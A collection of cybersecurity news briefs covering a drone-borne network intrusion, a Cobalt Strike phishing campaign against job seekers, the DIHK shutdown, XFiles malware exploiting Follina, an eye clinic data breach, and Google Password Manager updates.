The use of drones equipped with cyber-spying equipment was previously limited to abstract academic discussions among cybersecurity enthusiasts, but now, drones can be used in the real world to penetrate networks and steal information. 

On October 10, cybersecurity researcher Greg Linares published a Twitter thread providing a brief overview of a drone-based cyberattack he had recently witnessed while working as a freelance researcher.  

According to Mr. Gohel, the incident began when an unnamed financial company picked up unusual traffic on its network as a result of the hack. In the process of tracing the Wi-Fi signal, the con men discovered two drones on the roof and alongside, they also discovered some other activity on the network. 
 
Linares described one of the drones as being a modified DJI Phantom which carried what he called a "modified Wifi Pineapple device" and the other as being a similarly modified DJI Matrice 600 device which contained "a Raspberry Pi, batteries, GPD mini laptop, a 4G modem, and another Wi-Fi device," he explained. 

In addition to the successful cyberattack, Linares explained that the attackers were also able to access devices connected to the Atlassian Confluence site from the internal page. This was done to steal credentials and other information. During the threat hunters' investigation, they discovered that one of the drones had been damaged but was still functional. 

"In light of the limited success of this attack, it appears that once the attackers were detected, they crashed the drone as they were recovering it from the ground," Linares claimed on Twitter.

He further explained that a drone attack of this kind would probably not cost more than $15,000 to be put together, although he did not provide an exact figure. 

As he explained in his warning, attackers spend this amount of money on internal devices and do not care about destroying them. "This is the third real-world attack I have encountered from a drone in the last two years," he added. 

Malware Campaign Targets Job Seekers With Cobalt Strike Beacons

 



A social engineering campaign is exploiting a years-old remote code execution vulnerability in Microsoft Office to deploy Cobalt Strike beacons and target job seekers. 

According to a report published on Wednesday by Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer, an evidential payload that was discovered, appears to be a leaked version of a Cobalt Strike beacon.

Beacon configuration consists of commands that can be used to inject arbitrary binaries directly into processing queues. A high reputation domain is configured on the beacon, exhibiting the redirection technique to disguise the beacon's traffic.

There have been some malicious activity, discovered a year ago in August 2022, that attempts to exploit the vulnerability CVE-2017-0199, which is a remote code execution vulnerability in Microsoft Office that allows an attacker to take control of an affected system remotely.

Phishing emails, which come from New Zealand's Public Service Association, a trade union based in the country, are one of the entry vectors for the attack, containing a Microsoft Word attachment containing job-related lures for positions in the U.S. government and Public Service Association, an American union. For Cisco Talos, the Cobalt Strike beacons are far from the only malware samples that are being deployed, because the company has also observed that the Redline Stealer and Amadey botnet executables are being used as payloads at the other end of the attack chain to deliver the malware samples.

A cybersecurity expert noted that the attack was highly modularized, adding that Bitbucket repositories were used to host malicious content. As a result of the Bitbucket repositories hosting the malicious content, the attack launched the download of the malware executable that was responsible for installing the Cobalt Strike DLL beacon, a harmful piece of code that attackers could potentially use in the future to exploit the computer.

There are several attack sequences that can be executed in Bitbucket. These involve exploiting the obfuscated VB and PowerShell scripts stored in the repository to deliver an assault script to the beacon, which is hosted from a different Bitbucket account.

"This campaign is a well-known example of how a threat actor employs a technique of generating and executing a malicious script in the system memory of the victim as a means of attacking the system." the researchers said.

"Organizations should be constantly vigilant on the Cobalt Strike beacons and should implement layered defense capabilities to thwart the attacker's attempts at the earliest stage in the infection chain so as to thwart the attack's progress."

DIHK Suffers Cyberattacks, Shuts Down IT Systems


About the DIHK Attack

The association of German Chambers of Industry and Commerce (DIHK) was compelled to close down all of its IT systems and shut off digital services, telephones, e-mail servers, as a counter measure to the cyberattack. 

DIHK is an association of 79 chambers that represent organizations within the German state, with more than 3 million members having business ranging from small shops to large enterprises within the country. 

The organisations attends to matters of legal representation foreign trade promotion, consultation, regional economic development, training, and offers generic assistance services to the members. 


How did attackers breach DIHK

A statement released on the DIHK site explains the shutdown as a precautionary measures, and provide IT teams time to find a solution and bring out a counter measure. 

Few services of the companies are slowly getting available again after some aggressive reviews that make sure it's safe to use them. But, the restoration of service isn't complete at the moment. 

DIHK general manager Michael Bergmann via a LinkedIn post told the public about the cyberattack incident that happened on Wednesday, and noted the incident as 'massive.' Currently, DIHK can't sayfor how long the urgent shutdown measures will be needed. 

The attack shows hints of ransomware, the systems have been shut down to stop the malware from spreading further, however, this information hasn't been verified officially. 

Besides this, no announcements of a successful compromise off DIHK on any of the big ransomware websites, however, it is too soon to comment on that. The cyberattack's impact doesn't have any local focus. 

Bleeping Computers reports "individual divisions in North Rhine-Westphalia, Lower Saxony, Bavaria, and Mecklenburg-Western Pomerania have all confirmed facing problems. For example, the Chamber of Industry and Commerce in Köln informed the public that phone lines work to a limited extent, while its website was still offline at the time of this writing."





XFiles Malware Exploits Follina, Expands ItsAttacks

What is XFiles?

The X-Files info stealer malware has put a new vulnerability in its systems to exploit CVE-2022-30190- Follina, and attack targeted systems with malicious payloads. A cybersecurity firm said that the new malware uses Follina to deploy the payload, run it, and take control of the targeted computer. "In the case of the XFiles malware, researchers at Cyberint noticed that recent campaigns delivering the malware use Follina to download the payload, execute it, and also create persistence on the target machine," says Bleeping Computers.  

How is Follina infected? 

•The malware, sent in the victims' spam mail, consists of an OLE object that directs to an HTML file on an external resource that has JavaScript code, which exploits Follina. 

•After the code is executed, it gets a base64-encoded string that contains PowerShell commands to make a presence in the Windows startup directory and deploy the malware. 

•The second-stage module, "ChimLacUpdate.exe," consists of an AES decryption key and a hard-coded encryption shellcode. An API call decodes it and deploys it in the same running process. 

•After infection, XFiles starts normal info stealer malware activities like targeting passwords and history stored in web browsers, cookies, taking screenshots, and cryptocurrency wallets, and look for Telegram and Discord credentials. 

•The files are locally stored in new directories before they are exfiltrated via Telegram. 

The XFiles is becoming more active 

• A cybersecurity agency said that XFiles has expanded by taking in new members and initiating new projects. 

• A project launched earlier this year by Xfiles is called the 'Punisher Miner.' 

• However, it's an irony that a new mining tool will charge $9, the same as how much XFiles costs for a month of renting the info stealer. 

CyWare Social says "it appears that the XFiles gang is expanding and becoming more prolific. The gang is recruiting talented malware authors, becoming stronger, and thus providing their users with more readymade tools that do not require experience or coding knowledge. Successful incorporation of the Follina-exploiting document increases the chances of infection and consequently increases the success rate of attacks."

US Eye Clinic Suffers Data Breach, 92,000 Patients Hit

 

A healthcare clinic based in Missouri US named ‘Mattax Neu Prater Eye Center’ has suffered a cyber attack, in the wake of which, the center announced the breach at the end of June. However, the attack took place in December 2021. The center has informed the US regulators of a data breach in which more than 92,000 individuals have been affected.

“This incident has affected eye care practices across the country, and is not specific to Mattax Neu Prater. This data security incident occurred entirely within Eye Care Leaders’ network environment, and there were no other remedial actions available to Mattax Neu Prater,” center added. 

Mattax Neu Prater Eye Center is a premier provider of advanced laser vision correction, such as LASIK, as well as cataract correction and advanced technology replacement lenses in Springfield, Missouri US. It provides surgical and non-surgical care and has reported that the “third-party data security incident” may have compromised the sensitive data of patients. 

“However, a lack of available forensic evidence prevented Eye Care Leaders from ruling out the possibility that some protected health information and personally identifiable information may have been exposed to the bad actor,” the clinic added. 

Further, Mattax Neu Prater said that at present the firm does not hold any evidence of identity theft as a result of the incident, but following the attack, the clinic has informed its patients who might be impacted via postal mail. 

Cybersecurity experts suggest that all healthcare organizations should adopt a zero-trust approach to digital facilities. This approach treats every connected device as a potential intruder until it is accurately verified. According to the Experts, old-school approaches like using firewalls and antivirus software have become less effective. 

Cybersecurity researchers also believe that the best way to protect the system is by deleting passwords altogether. Some other cybersecurity tips that can help healthcare professionals are given below:

• Store patient data on systems that are not connected to the internet. 
• Train staff on phishing attacks and how they work. 
• Use two-factor or multi-factor (biometrics) for logins instead of passwords.
• Never click links in email or download attachments. 
• Encrypt all data so if it is accessed or compromised, it will not be exposed.

Google Announces Password Manager Updates to Enhance User Security

 

Last week, Google updated its Password Manager service dedicated to users who have been facing troubles with their passwords. 

The users using the Chrome browser can now utilize Google Password Manager's auto-fill option to enable the browsers to remember the passwords and keep them in memory of all the sites which the users are visiting, the company told in a blog post. 

Earlier, users were allowed to add passwords to Google Password Manager only when Google used to prompt the user to enter the password; now, they can manually add passwords at any time. 

Although Google is not yet comfortable with making Password Manager a standalone app, users on Android can now add a shortcut to it on the home screen. Customers can use their iPhones to generate unique, strong passwords for their apps when they opt for Chrome as the default autofill provider. 

Additionally, the built-in Password Checkup feature on Android is receiving an upgrade of its own too. Beyond checking for hacked credentials, it can further highlight weak and reused passwords à la Apple iOS. Google is also expanding the compromised password warnings to Chrome users across all operating systems. 

Last but not least, Google is launching a new "Touch-to-Login" to Chrome on Android that allows users to sign in to websites with a single tap after entering the credentials with autofill. It's worth noting that Apple implemented a similar feature in Safari with iOS 12.2. 

According to Google's blog post, the latest updates and added features have been designed at the Google Safety Engineering Center, where the privacy and security experts work on creating a secured ecosystem for the customers. 

The blogpost further stated, “Of course, our efforts to create a safer web are a truly global effort – from our early work on 2-step verification to our future investments in technologies like passkeys – and these updates that we are rolling out over the next months are an important part of that work.” 

The announcement comes after Verizon’s 2022 Data Breach Investigations Report highlighted that compromised credentials accounted for almost 50% of data breaches.